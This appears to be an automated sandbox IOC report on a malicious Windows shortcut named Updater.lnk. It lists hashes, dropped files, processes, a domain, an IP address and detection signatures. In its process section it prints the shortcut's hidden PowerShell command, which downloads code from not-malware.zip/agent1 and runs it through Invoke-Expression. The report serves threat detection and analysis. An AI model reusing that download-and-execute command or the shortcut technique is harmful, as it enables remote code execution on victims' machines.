Automated Malware Analysis IOC Report for

Files

File Path

Type

Category

Malicious

Updater.lnk

MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Icon number=146, Archive, ctime=Sat May 8 07:16:08 2021, mtime=Sat May 8 07:16:08 2021, atime=Sat May 8 07:16:08 2021, length=450560, window=hide

initial sample

Details

Filetype:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Icon number=146, Archive, ctime=Sat May 8 07:16:08 2021, mtime=Sat May 8 07:16:08 2021, atime=Sat May 8 07:16:08 2021, length=450560, window=hide
Entropy:	4.551393248902559
Filename:	Updater.lnk
Filesize:	1770
MD5:	f2e316a3ab622ceb0e124a2eeda4fec8
SHA1:	900cb6a845ae917cc596ea67a3fe91a78fd74dc2
SHA256:	8320cd98e0570dba3dab017982d883768eb75f86e0d8ffb90ed4bf598b4835af
SHA512:	859a98101715e23023c54180dd80978c8312d9c2bff080dacda8db0bd6aa45c53594e2f95e79c681f999355ad294a265a9a194ab255e963f7fc2a8088d782999
SSDEEP:	24:8GkUmD6XDvYwZKXEBWo3ANkWD+/CW//5i63EGsNO4I0WOf/8s5RgoHFt3C7ygHFh:8em2zCoQkkBLIoH8s5RVFtS7yaFK
Preview:	L..................F.... ....\|=f.C...\|=f.C...\|=f.C...............................P.O. .:i.....+00.../C:\...................V.1......X.~..Windows.@........R.@.X.~..........................$.L.W.i.n.d.o.w.s.....Z.1......X....System32..B........R.@.X........

Signature Hits	Behavior Group	Mitre Attack
Windows shortcut file (LNK) contains relative path	System Summary

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

data

dropped

Details

File:	C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Category:	dropped
Dump:	StartupProfileData-NonInteractive.1.dr
ID:	dr_3
Target ID:	1
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Type:	data
Entropy:	5.434540712391156
Encrypted:	false
Ssdeep:	24:3iSSKco4KmBs4RPT6BmFoUe7u1omjKcm9qr9t7J0gt/NKCpnd+9tNbr6TNM:TSU4y4RQmFoUeCamfm9qr9tK8NLpk9Pv
Size:	1412
Whitelisted:	false
Reputation:	low

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eardrvsg.gdx.psm1

ASCII text, with no line terminators

dropped

Details

File:	C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eardrvsg.gdx.psm1
Category:	dropped
Dump:	__PSScriptPolicyTest_eardrvsg.gdx.psm1.1.dr
ID:	dr_2
Target ID:	1
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Type:	ASCII text, with no line terminators
Entropy:	4.038920595031593
Encrypted:	false
Ssdeep:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
Size:	60
Whitelisted:	false
Reputation:	high

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kcxecxfp.oo1.ps1

ASCII text, with no line terminators

dropped

Details

File:	C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kcxecxfp.oo1.ps1
Category:	dropped
Dump:	__PSScriptPolicyTest_kcxecxfp.oo1.ps1.1.dr
ID:	dr_1
Target ID:	1
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Type:	ASCII text, with no line terminators
Entropy:	4.038920595031593
Encrypted:	false
Ssdeep:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
Size:	60
Whitelisted:	false
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
Creates temporary files	System Summary

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\541635b9b641c2ad.customDestinations-ms (copy)

data

dropped

Details

File:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\541635b9b641c2ad.customDestinations-ms (copy)
Category:	dropped
Dump:	5B4U7OBXQCPVLN6PZWKU.temp.1.dr
ID:	dr_4
Target ID:	1
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Type:	data
Entropy:	3.7662404699299046
Encrypted:	false
Ssdeep:	48:5DHIDJEJlAQvJl66SogZohJXJagQvJlJ6SogZohJXJO1:5LOQvJeHuQvJ3HL
Size:	4545
Whitelisted:	false
Reputation:	low

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5B4U7OBXQCPVLN6PZWKU.temp

data

dropped

Details

File:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5B4U7OBXQCPVLN6PZWKU.temp
Category:	dropped
Dump:	5B4U7OBXQCPVLN6PZWKU.temp.1.dr
ID:	dr_0
Target ID:	1
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Type:	data
Entropy:	3.7662404699299046
Encrypted:	false
Ssdeep:	48:5DHIDJEJlAQvJl66SogZohJXJagQvJlJ6SogZohJXJO1:5LOQvJeHuQvJ3HL
Size:	4545
Whitelisted:	false
Reputation:	low

Processes

Path

Cmdline

Malicious

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -c "Invoke-RestMethod -Uri not-malware.zip/agent1 | Invoke-Expression"

Details

Is windows:	true
Is dropped:	false
PID:	3036
Target ID:	1
Parent PID:	4056
Name:	powershell.exe
Class:	powershell
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -c "Invoke-RestMethod -Uri not-malware.zip/agent1 \| Invoke-Expression"
Size:	452608
MD5:	04029E121A0CFA5991749937DD22A1D9
Time:	18:27:29
Date:	23/05/2024
Reason:	newprocess
Reputation:	high
Is admin:	true
Is elevated:	true
Modulebase:	0x7ff741d30000
Modulesize:	462848
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Windows shortcut file (LNK) starts blacklisted processes	Persistence and Installation Behavior	Process Discovery
Suspicious powershell command line found	Data Obfuscation	PowerShell
Sigma detected: Usage Of Web Request Commands And Cmdlets	System Summary
Sigma detected: Non Interactive PowerShell Process Spawned	System Summary
Spawns processes	System Summary	Process Injection
Windows shortcut file (LNK) contains relative path	System Summary

C:\Windows\System32\conhost.exe

C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

Details

Is windows:	true
Is dropped:	false
PID:	2648
Target ID:	2
Parent PID:	3036
Name:	conhost.exe
Path:	C:\Windows\System32\conhost.exe
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Size:	862208
MD5:	0D698AF330FD17BEE3BF90011D49251D
Time:	18:27:29
Date:	23/05/2024
Reason:	newprocess
Reputation:	high
Is admin:	true
Is elevated:	true
Modulebase:	0x7ff75da10000
Modulesize:	892928
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Spawns processes	System Summary	Process Injection

URLs

Name

Malicious

https://not-malware.zip/agent1

172.67.175.37

http://not-malware.zip/agent1

172.67.175.37

Domains

Name

Malicious

not-malware.zip

172.67.175.37

Details

Name:	not-malware.zip
IP:	172.67.175.37
TargetID:	-1
Active:	true

Signature Hits	Behavior Group	Mitre Attack
Suspicious powershell command line found	Data Obfuscation	PowerShell
Sigma detected: Usage Of Web Request Commands And Cmdlets	System Summary
Uses a known web browser user agent for HTTP communication	Networking	Application Layer Protocol
Downloads files from webservers via HTTP	Networking	Application Layer Protocol Non-Application Layer Protocol Ingress Tool Transfer
Performs DNS lookups	Networking	Application Layer Protocol Non-Application Layer Protocol
Sigma detected: Non Interactive PowerShell Process Spawned	System Summary
Spawns processes	System Summary	Process Injection
Uses secure TLS version for HTTPS connections	Compliance, Networking

IPs

Domain

Country

Malicious

172.67.175.37

not-malware.zip

United States

Details

IP:	172.67.175.37
TargetID:	1
Current Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Country:	United States
Countrycode:	USA
ASN number:	13335
ASN name:	CLOUDFLARENETUS
Private:	false
Domain:	not-malware.zip

Signature Hits	Behavior Group	Mitre Attack
Uses secure TLS version for HTTPS connections	Compliance, Networking

Registry

Path

Value

Malicious

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

EnableFileTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

EnableAutoFileTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

EnableConsoleTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

FileTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

ConsoleTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

MaxFileSize

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

FileDirectory